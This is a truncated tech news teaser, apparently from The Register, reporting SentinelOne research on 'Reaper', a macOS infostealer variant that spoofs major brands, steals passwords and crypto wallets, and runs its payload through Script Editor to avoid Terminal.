TECH NEWS

Do fear the Reaper - stealer swipes macOS users' passwords, wallets, then backdoors them

https://image.theregister.com/5242280.jpg?imageId=5242280&x=0&y=0&cropw=100&croph=100&panox=0&panoy=0&panow=100&panoh=100&width=1200&height=683

While also spoofing all the trusted domains - Apple, Microsoft, and Google - in the same attack

A new infostealer variant targets macOS users by spoofing Apple, Microsoft, and Google and then then gets to work searching for victims’ password managers so it can steal all of their credentials and access cryptocurrency wallets such as MetaMask and Phantom.

The updated SHub stealer variant is called Reaper, and it uses macOS Script Editor, pre-populated with the malicious payload to execute the malware, according to SentinelOne research engineer Phil Stokes, who documented the attack in a Monday blog.

But unlike earlier SHub versions and similar macOS stealer campaigns that rely on ClickFix social engineering tactics to trick the user into pasting a ScriptEditor command into Apple’s Terminal command-line interface, Reaper bypasses Terminal altogether and therefore defeats defenses Apple added to Tahoe 26.4.

The attack starts with fake WeChat and Miro installer...

Copyright of this story solely belongs to theregister.com. To see the full text click HERE

Read more